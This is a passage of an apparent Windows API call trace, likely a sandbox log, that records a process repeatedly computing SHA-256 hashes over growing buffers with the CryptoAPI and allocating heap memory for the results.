	[0153.393] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307e88
	[0153.393] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2307e88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307e88, pdwDataLen=0x128aac) returned 1
	[0153.393] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.393] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.393] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.394] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.394] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0153.394] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307eb0
	[0153.394] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2307eb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307eb0, pdwDataLen=0x128aac) returned 1
	[0153.394] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.394] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.394] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.394] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.394] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0153.395] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.395] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307ed8
	[0153.395] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2307ed8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307ed8, pdwDataLen=0x128aac) returned 1
	[0153.395] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.395] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.395] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.395] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.395] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0153.395] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.395] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307f00
	[0153.395] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2307f00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307f00, pdwDataLen=0x128aac) returned 1
	[0153.395] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.395] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.395] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.396] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.396] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0153.396] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.396] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307f28
	[0153.396] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2307f28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307f28, pdwDataLen=0x128aac) returned 1
	[0153.396] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.396] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.396] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.397] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.397] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0153.397] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307f50
	[0153.397] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2307f50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307f50, pdwDataLen=0x128aac) returned 1
	[0153.397] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.397] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.397] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.397] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.397] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0153.397] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307f78
	[0153.397] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2307f78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307f78, pdwDataLen=0x128aac) returned 1
	[0153.397] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.397] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.397] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.398] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.398] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0153.398] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.398] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307fa0
	[0153.398] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2307fa0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307fa0, pdwDataLen=0x128aac) returned 1
	[0153.398] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.398] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.398] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.398] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.398] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0153.398] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.398] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307fc8
	[0153.398] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2307fc8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307fc8, pdwDataLen=0x128aac) returned 1
	[0153.398] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.399] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.399] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.399] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.399] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0153.399] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.399] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307ff0
	[0153.399] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2307ff0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2307ff0, pdwDataLen=0x128aac) returned 1
	[0153.399] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.399] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.399] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.400] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.400] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0153.400] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.400] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308018
	[0153.400] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308018, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308018, pdwDataLen=0x128aac) returned 1
	[0153.400] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.400] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.400] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.400] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.400] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0153.400] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.400] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308040
	[0153.400] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308040, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308040, pdwDataLen=0x128aac) returned 1
	[0153.400] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.400] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.400] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.401] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.401] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0153.401] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308068
	[0153.401] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308068, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308068, pdwDataLen=0x128aac) returned 1
	[0153.401] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.401] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.401] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.401] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.401] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0153.401] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308090
	[0153.401] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308090, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308090, pdwDataLen=0x128aac) returned 1
	[0153.401] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.401] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.401] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.402] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.402] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0153.402] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23080b8
	[0153.402] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23080b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23080b8, pdwDataLen=0x128aac) returned 1
	[0153.402] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.402] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.402] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.402] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.402] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0153.402] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23080e0
	[0153.402] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23080e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23080e0, pdwDataLen=0x128aac) returned 1
	[0153.403] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.403] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.403] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.403] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.403] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0153.403] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308108
	[0153.403] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308108, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308108, pdwDataLen=0x128aac) returned 1
	[0153.403] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.403] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.403] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.404] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.404] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0153.404] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.404] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308130
	[0153.404] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308130, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308130, pdwDataLen=0x128aac) returned 1
	[0153.404] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.404] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.404] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.404] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.404] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0153.404] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.404] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308158
	[0153.404] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308158, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308158, pdwDataLen=0x128aac) returned 1
	[0153.404] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.404] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.404] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.405] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.405] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0153.405] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.405] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308180
	[0153.405] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308180, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308180, pdwDataLen=0x128aac) returned 1
	[0153.405] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.405] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.405] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.405] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.405] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0153.405] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.405] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23081a8
	[0153.405] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23081a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23081a8, pdwDataLen=0x128aac) returned 1
	[0153.405] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.405] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.405] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.406] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.406] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0153.406] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.406] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23081d0
	[0153.406] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23081d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23081d0, pdwDataLen=0x128aac) returned 1
	[0153.406] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.406] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.406] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.406] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.407] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0153.407] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.407] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23081f8
	[0153.407] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23081f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23081f8, pdwDataLen=0x128aac) returned 1
	[0153.407] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.407] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.407] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.407] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.407] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0153.407] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.407] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308220
	[0153.407] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308220, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308220, pdwDataLen=0x128aac) returned 1
	[0153.407] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.407] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.407] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.408] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.408] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0153.408] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308248
	[0153.408] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308248, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308248, pdwDataLen=0x128aac) returned 1
	[0153.408] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.408] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.408] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.408] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.408] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0153.408] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308270
	[0153.408] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308270, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308270, pdwDataLen=0x128aac) returned 1
